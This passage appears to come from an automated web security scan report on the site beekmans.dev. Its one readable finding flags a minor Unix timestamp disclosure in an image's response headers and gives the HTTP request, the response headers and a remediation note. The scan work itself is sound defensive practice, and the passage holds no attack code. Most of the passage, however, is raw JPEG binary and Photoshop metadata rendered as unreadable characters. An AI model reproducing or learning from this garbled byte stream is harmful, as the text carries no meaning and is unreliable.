ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢éò+ã–Òù¶
          @EˆÞ¨e;[vEzš	[SÿÈÓ%vªSû“xØù#*÷ÔkµnÓí“jNèâ__˜ô#×ò==ÍT|>c­|»¯7oVÌÞ¸©qY¼d¾¤k½-u$…þÛ'Œª
          #­ÆÖ"–ŽUúØ«ueY:ÚêÈâÝõFGì>`úéÑÌN²ÊqÐ{'çýnôêñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõO¡ÿ_ÛgÏ«Ž]ïòîþc§n6¡>AgYöó56'¯;'-Qs·®
          -­»ë§k¶úc¢¯“CqÇí´=1-õ†­S@½Þc׿>/?·ˆWzØü@זIßŔyü×çê<ü³Ç`ðCÊAR‚ ‚8 d:ïߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          242265558
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        45. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          51124270, which evaluates to: 1971-08-15 18:11:10

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1162 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:07 GMT
          Content-Type: image/jpeg
          Content-Length: 206479
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "3268f-5cfcb9bec2340"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 2419
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYXxHO2kzCBxL9qJ96pBwK%2Fu7dVLWBMYkUBmyhg22h%2FJCxoI7u0Yf9ccFyIITYmPwk%2BYbhFBi8dkM8jrfr7jbM2TCDCUS4Fm46vKeCPMJFbFffN2RsHn4GLPwNUiVLI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47d1d0f4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (206479 bytes)
          ÿØÿáæExifMM*bj(1!r2“‡i¨Ô
          ü€'
          ü€'Adobe Photoshop 21.0 (Macintosh)2019:12:03 13:35:22  ° v"*(2¬HHÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙÿí.Photoshop 3.08BIMïZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%GZ%G+R8BIM%jäÞ캐Lµj`,ë–E¯8BIM:åprintOutputPstSboolInteenumInteClrmprintSixteenBitboolprinterNameTEXTprintProofSetupObjcProof Setup
          proofSetupBltnenumbuiltinProof	proofCMYK8BIM;-printOutputOptionsCptnboolClbrboolRgsMboolCrnCboolCntCboolLblsboolNgtvboolEmlDboolIntrboolBckgObjcRGBCRd  doub@oàGrn doub@oàBl  doub@oàBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@R
          vectorDataboolPgPsenumPgPsPgPCLeftUntF#RltTop UntF#RltScl UntF#Prc@YcropWhenPrintingboolcropRectBottomlongcropRectLeftlong
          cropRectRightlongcropRectToplong8BIMíHH8BIM&?€8BIMò
          ÿÿÿÿÿÿ8BIM
          8BIM8BIMó	8BIM'
          8BIMõH/fflff/ff¡™š2Z5-8BIMøpÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿèÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿè8BIM8BIM
          8BIM08BIM-)í8BIM@@8BIM8BIM}v°$19-top_5_vulnerability_scanners copy°vnullboundsObjcRct1Top longLeftlongBtomlongvRghtlong°slicesVlLsObjcslicesliceIDlonggroupIDlongoriginenumESliceOrigin
          autoGeneratedTypeenum
          ESliceTypeImg boundsObjcRct1Top longLeftlongBtomlongvRghtlong°urlTEXTnullTEXTMsgeTEXTaltTagTEXTcellTextIsHTMLboolcellTextTEXT	horzAlignenumESliceHorzAligndefault	vertAlignenumESliceVertAligndefaultbgColorTypeenumESliceBGColorTypeNone	topOutsetlong
          leftOutsetlongbottomOutsetlongrightOutsetlong8BIM(?ð8BIM)î8BIMÈ Tà€¬ÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
          Ç­®kÚÐ,w Gî¬þ–æ·%ÅÄ4l:;µiœ¬``ÚÀG#pþõ.Cf©l{¯ë3Áßæ;ÿ"©õ-×VÆÔǸ‡I†;ˆ#¸óVþ׋þš¿ó‡÷¥ö¼_ôÕÿœ?½0X7E%Åû6OúÿšRû6OúÿšV×ÚñÓWþpþô¾×‹þš¿ó‡÷©=É~ê8GwìÙ?è_þiU:…ù˜~˜¯§ef$ŸEš4ún#ó§Úº_µâÿ¦¯üáýé}¯ý5çïKܗwx¼Ž£ÔîǺ‘Ðóšm­õ‡Èíu{¾æî\“~«õÐÐ>œ æ^½‡íx¿é«ÿ8z_kÅÿM_ùÃûÒ÷Oî~k­‹ãÿóc®ÿÜŸûeëwêû:·GÄ·Α™y¶ßT9Œ-le{aàþâô?µâÿ¦¯üáýé}¯ý5çïKÝ?¹ù¨›KËàåæåÞi³¥åâ
          ¥ÂË[,$~d€6»÷U㍐D^GõJÚû^/újÿÎޗÚñÓWþpþôŽCû«hwy~£™WK¯~Cíx>†3´ÞáùÖÍÇ®}ÿ¿üÚäÝÔ³Æyê>±v[¹ä{\ßô.¯þãÿÁèÏzØúó‹”þ¤ÌÚ/g°VÝ퇁³vìg£õ7zµþÿé?bŸ(F<Qˆ7ýêùdœèJF\:{N“Ô+êÔ1Ø}Zà_@÷9„ýëÔý¿¢³þþ¯}›'ýÿÍ+Îñs²ú~[30¬ô²+àò×4ý*­gøJŸùìÿўõé]ë>YÄ6nn>MP21Þá,'óÚã·Ô¡ÿàíÿÑ¿£LÉÅ@°³„!û6OúÿšT_]Œ€ö9“Æá·V10.dŸåïYýYíu•mpt5ÜîÔÈ̓DRÑÿÔî1¿œ?Õþ!BïçŸñþçT•ŸÒYÑúD´_<$œ‡è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~‡Ñ-Ï	$§è}Ñ|ð’J~„¿Ðô,ûNß³í>¶ÿ£·ù_ëýEÃdú>«þÏ¿ÐÜ}/SéíüÝð¼Ñ%&>©‹èRéß´hÓû.~Û'ÓýÝ¿á}yöý›oóûÿó禼õ$e³#ôES¾½ÛwKwm³ùÛ7{¶nú‘²þ“>ò¯œRPu}ÿÙ8BIM!WAdobe PhotoshopAdobe Photoshop 20208BIMÿá+Yhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c148 79.164036, 2019/08/13-01:06:57        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)" xmp:CreateDate="2015-08-12T08:40:52-06:00" xmp:MetadataDate="2019-12-03T13:35:22-07:00" xmp:ModifyDate="2019-12-03T13:35:22-07:00" dc:format="image/jpeg" xmpMM:InstanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" xmpMM:DocumentID="adobe:docid:photoshop:90dc98be-e3c9-bd43-aa6c-4c8d5ec2c480" xmpMM:OriginalDocumentID="xmp.did:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:2dd2cb17-05f1-a641-a3c6-86b1aaedfa00" stEvt:when="2015-08-12T08:40:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:c59fedb7-5aae-dc44-806c-a9ae14d83653" stEvt:when="2015-08-12T10:34:52-06:00" stEvt:softwareAgent="Adobe Photoshop CC 2015 (Windows)" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:70aec4d0-117c-4e82-a61d-a7745e5349a0" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> <rdf:li stEvt:action="converted" stEvt:parameters="from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="derived" stEvt:parameters="converted from application/vnd.adobe.photoshop to image/jpeg"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:693fca51-7f0d-4c7d-ad46-3be3b13f7170" stEvt:when="2019-12-03T13:35:22-07:00" stEvt:softwareAgent="Adobe Photoshop 21.0 (Macintosh)" stEvt:changed="/"/> </rdf:Seq> 